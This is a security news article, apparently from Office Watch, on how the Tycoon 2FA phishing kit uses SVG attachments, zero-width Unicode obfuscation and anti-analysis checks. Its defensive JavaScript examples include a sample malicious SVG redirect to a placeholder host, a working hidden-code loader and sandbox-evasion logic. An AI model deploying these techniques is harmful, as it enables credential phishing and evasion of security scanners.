
Beware SVG graphics used to Bypass Microsoft 365 Security Measures

SVG attachments and invisible Unicode characters are increasingly being used to break into the Microsoft 365 and Google/Gmail accounts of people who have multi-factor authentication (MFA) switched on. It is possible because of significant enhancements to the Tycoon 2FA phishing platform.

Hacking into accounts is big business and, like most businesses, hacking has moved into the cloud. "Software as a service" (SaaS) is now the norm for legitimate products (Copilot and other AI tools among many). Criminals have done the same thing, selling hacking toolkits with an automated online component, known as Phishing-as-a-Service (PhaaS).

These toolkits are a complete subscription service with pre-built phishing kits, user support, attack dashboards and even credential storage. They capture the victim's login details, including the time-limited MFA code, and pass them to the real service within seconds, before the code expires, so the attacker can log in to misuse or lock the account. All while the hacker is playing an online game or asleep.

First documented by Sekoia researchers in October 2023, the Tycoon 2FA Phishing-as-a-Service (PhaaS) platform has been in active use since at least August 2023. The latest developments, reported by Trustwave, show that the platform's operators have added several sophisticated techniques to evade detection and strengthen their phishing campaigns.

Trustwave has observed a significant increase in phishing attacks using malicious SVG (Scalable Vector Graphics) files, with a reported 1,800% rise from April 2024 to March 2025. These SVG files often masquerade as voice messages or document icons and contain obfuscated JavaScript that redirects victims to counterfeit Microsoft 365 login pages. The reason SVG works for this is that, unlike a PNG or JPEG, an SVG is an XML document that the browser renders like a web page, so any script or event handler inside it runs the moment the "image" is opened.
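As an added example (not code from the article or from Trustwave's report), here is the kind of static check an email gateway or a curious admin can run over an SVG attachment before it reaches a mailbox. It flags the features that turn an image into an executable document: script elements, event-handler attributes, javascript: and data: URLs, foreignObject (which can embed HTML) and outbound references. Both SVG samples are constructed for this example; the "phishing" destination is a placeholder domain, not a real one.

```javascript
// Added example: static indicators that make an SVG attachment dangerous.
// SVG is XML that browsers render as a document, so <script>, on*="..." event
// handlers and javascript: URLs inside it all execute when the file is opened.

const INDICATORS = [
  // [name, regular expression applied to the raw file text]
  ['script-element',     /<script\b/i],
  ['event-handler',      /\son[a-z]+\s*=/i],
  ['javascript-uri',     /(?:href|xlink:href|src)\s*=\s*["']\s*javascript:/i],
  ['data-uri-html',      /(?:href|xlink:href|src)\s*=\s*["']\s*data:text\/html/i],
  ['foreignobject',      /<foreignObject\b/i],
  ['external-reference', /(?:href|xlink:href)\s*=\s*["']\s*https?:\/\//i],
  ['entity-expansion',   /<!ENTITY\b/i],
];

// Returns the names of every indicator present in the SVG text, in table order.
function scanSvg(svgText) {
  return INDICATORS.filter(([, re]) => re.test(svgText)).map(([name]) => name);
}

// Gateway decision: a "voice message" or "document" icon that only needs to be
// displayed has no business containing script or navigation of any kind.
function isSuspiciousSvg(svgText) {
  return scanSvg(svgText).length > 0;
}

// Constructed sample 1: a harmless icon.
const BENIGN_SVG = `<?xml version="1.0"?>
<svg xmlns="http://www.w3.org/2000/svg" width="64" height="64">
  <circle cx="32" cy="32" r="20" fill="#0078d4"/>
</svg>`;

// Constructed sample 2: the pattern the article describes, reduced to its
// essentials. Opened in a browser, the onload handler runs the script, which
// rebuilds "https://" from hex escapes (a trivial obfuscation) and navigates
// to the fake login page. The host is a placeholder, not a real phishing site.
const MALICIOUS_SVG = `<svg xmlns="http://www.w3.org/2000/svg" onload="init()">
  <text x="10" y="20">Voice message (0:42)</text>
  <script><![CDATA[
    function init() {
      var h = "\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f";
      window.location = h + "login-example.invalid/?u=" + btoa(document.referrer);
    }
  ]]></script>
</svg>`;

for (const [label, svg] of [['benign', BENIGN_SVG], ['malicious', MALICIOUS_SVG]]) {
  console.log(label, isSuspiciousSvg(svg) ? 'BLOCK' : 'allow', scanSvg(svg));
}
```

Run with Node; the benign icon is allowed and the constructed sample is blocked for `script-element` and `event-handler`. Regex matching is deliberately crude (it runs on the raw bytes, so an attacker cannot hide from it with XML comments or odd encodings the way they could from a DOM parser), and any hit is enough to quarantine an attachment that should never need a script in the first place.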

One notable advancement is the use of invisible Unicode characters (zero-width and similar non-printing code points) within JavaScript code to conceal malicious payloads. The hidden characters encode the real code, which a small decoder rebuilds and runs normally at runtime, while a static scanner or a person reading the file sees only harmless-looking text.
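The following added example (not code from the article or from the Tycoon 2FA kit) shows the principle behind the invisible-Unicode trick, together with the simplest detection. Each byte of the hidden script becomes eight zero-width characters, the run is spliced into an ordinary-looking string, and a tiny decoder pulls the characters back out and executes the result. The two code points chosen here (ZERO WIDTH SPACE and ZERO WIDTH NON-JOINER) are an assumption for illustration; kits use various invisible characters, but the encode/decode idea is the same. The hidden payload is a benign `return 6 * 7;` so the example can safely run it.

```javascript
// Added example: "invisible Unicode" obfuscation and its detection.
const ZERO = '\u200B'; // ZERO WIDTH SPACE      -> bit 0  (assumed choice)
const ONE  = '\u200C'; // ZERO WIDTH NON-JOINER -> bit 1  (assumed choice)

// Attacker side: turn each byte of the payload into 8 invisible characters.
function hideInZeroWidth(payload) {
  const bytes = new TextEncoder().encode(payload);
  let out = '';
  for (const b of bytes) {
    for (let i = 7; i >= 0; i--) out += ((b >> i) & 1) ? ONE : ZERO;
  }
  return out;
}

// Runtime decoder, the part that actually ships in the file: keep only the
// two invisible code points, regroup them into bytes, rebuild the source text.
function revealFromZeroWidth(text) {
  const bits = [...text].filter((c) => c === ZERO || c === ONE);
  const bytes = new Uint8Array(bits.length >> 3);
  for (let i = 0; i < bytes.length; i++) {
    let b = 0;
    for (let j = 0; j < 8; j++) b = (b << 1) | (bits[i * 8 + j] === ONE ? 1 : 0);
    bytes[i] = b;
  }
  return new TextDecoder().decode(bytes);
}

// Constructed payload: benign here; a kit would hide its redirect or
// credential-harvesting code instead.
const HIDDEN_CODE = 'return 6 * 7;';

// What a reviewer sees: a plain label. The 104 zero-width characters between
// "message" and "..." are present in the file but render as nothing.
const DECOY = 'Loading voice message' + hideInZeroWidth(HIDDEN_CODE) + '...';

// Executes the hidden code exactly as an obfuscated loader would.
function runHidden(decoy) {
  return Function(revealFromZeroWidth(decoy))();
}

// Defender side: count Unicode "format" (Cf) characters, the category that
// holds zero-width and other invisible code points. Legitimate script files
// contain almost none; a long run inside a string literal is a strong signal.
function countInvisible(text) {
  return [...text].filter((c) => /\p{Cf}/u.test(c)).length;
}

console.log('visible text       :', DECOY.replace(/\p{Cf}/gu, ''));
console.log('invisible characters:', countInvisible(DECOY));
console.log('hidden code returns :', runHidden(DECOY));
```

The decoy string prints as "Loading voice message..." yet carries 104 invisible characters and evaluates to 42 when decoded and run. For detection, counting `\p{Cf}` characters in attachment text (or simply rejecting them outright in scripts and SVGs) is cheap and has a very low false-positive rate, because real code rarely contains any.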

Additionally, Tycoon 2FA has replaced the Cloudflare Turnstile challenge with a self-hosted CAPTCHA drawn on an HTML5 canvas with randomized elements. This change is intended to stop security tools fingerprinting the phishing pages by their use of the third-party service and to make the pages easier to customize.

The platform also includes anti-debugging JavaScript designed to detect browser automation and analysis tools such as PhantomJS and Burp Suite. If such a tool is detected, the visitor is redirected to a legitimate website such as Rakuten.com, so that a security analyst or sandbox never sees the phishing page.
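An added example, not the kit's own code, of how that kind of gatekeeping script works. It checks for the artifacts automation leaves behind (the `navigator.webdriver` flag, PhantomJS's `callPhantom`/`_phantom` globals, headless or tool user agents, an empty language list) and times a `debugger` statement, which only stalls when developer tools are attached. The environment is passed in as a plain object so the logic runs under Node; in a browser you would pass the real `navigator` and `window`. The article does not say how the kit recognizes Burp Suite, so the user-agent substring used for it below is an assumption, and the phishing URL is a placeholder.

```javascript
// Added example: anti-analysis checks of the sort a phishing page runs before
// deciding whether to show itself. Not the Tycoon 2FA kit's code.

// User agents of headless/automation tools. "Burp" is an assumed marker.
const AUTOMATION_UA = /PhantomJS|HeadlessChrome|Burp/i;

// Returns the list of reasons the visitor looks like a tool rather than a person.
function looksAutomated(env) {
  const nav = env.navigator || {};
  const win = env.window || {};
  const reasons = [];
  if (nav.webdriver === true) reasons.push('navigator.webdriver');      // WebDriver spec flag
  if (AUTOMATION_UA.test(nav.userAgent || '')) reasons.push('user-agent');
  if ('callPhantom' in win || '_phantom' in win) reasons.push('phantomjs-globals');
  if ('__nightmare' in win) reasons.push('nightmare-global');
  if (Array.isArray(nav.languages) && nav.languages.length === 0) {
    reasons.push('no-languages');                                      // seen in some headless builds
  }
  return reasons;
}

// Debugger timing check: `debugger` is a no-op unless an inspector is
// attached, so a long gap across it means someone is stepping through the code.
function debuggerPauseMs() {
  const t0 = Date.now();
  debugger;
  return Date.now() - t0;
}

// What the script does with the verdict: analysts get sent to a legitimate
// site, everyone else gets the fake login page.
const DECOY_URL = 'https://www.rakuten.com/';
const PHISH_URL = 'https://login-example.invalid/m365'; // placeholder

function chooseDestination(env, pauseThresholdMs = 100) {
  const reasons = looksAutomated(env);
  if (debuggerPauseMs() > pauseThresholdMs) reasons.push('debugger-attached');
  return { url: reasons.length ? DECOY_URL : PHISH_URL, reasons };
}

// Constructed environments: an ordinary desktop browser and an analysis sandbox.
const REAL_USER = {
  navigator: {
    webdriver: false,
    userAgent: 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/124.0',
    languages: ['en-GB'],
  },
  window: {},
};
const SANDBOX = {
  navigator: { webdriver: true, userAgent: 'Mozilla/5.0 HeadlessChrome/124.0', languages: [] },
  window: { callPhantom: () => {} },
};

console.log('real user ->', chooseDestination(REAL_USER));
console.log('sandbox   ->', chooseDestination(SANDBOX));
```

The practical lesson for defenders is the inverse of the script: an automated URL scanner or detonation sandbox has to present a believable browser (no `webdriver` flag, a normal user agent and language list, no automation globals, no attached debugger) or it will only ever record a redirect to Rakuten.com and conclude the link is clean.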

What to do?

Most of these attacks target particular organizations or governments, so the main defences sit with network and email administrators: robust email filtering, blocking or at least flagging SVG attachments (they are rarely needed in email and can carry scripts), and phishing-resistant MFA such as FIDO2-compliant security keys. A FIDO2 login is bound to the genuine site's domain, so a counterfeit login page cannot capture and replay it the way it can a six-digit code. Together these mitigate the risks posed by advanced phishing platforms like Tycoon 2FA.

For everyone, it’s still a question of being on guard.  Be wary of any ‘out of the ordinary’ messages (email, instant message or voice) and especially anything which tries to provoke an ‘urgent’ response.  Hackers try to trick people into acting without thinking.

About this author

Office-Watch.com

Office Watch is the independent source of Microsoft Office news, tips and help since 1996.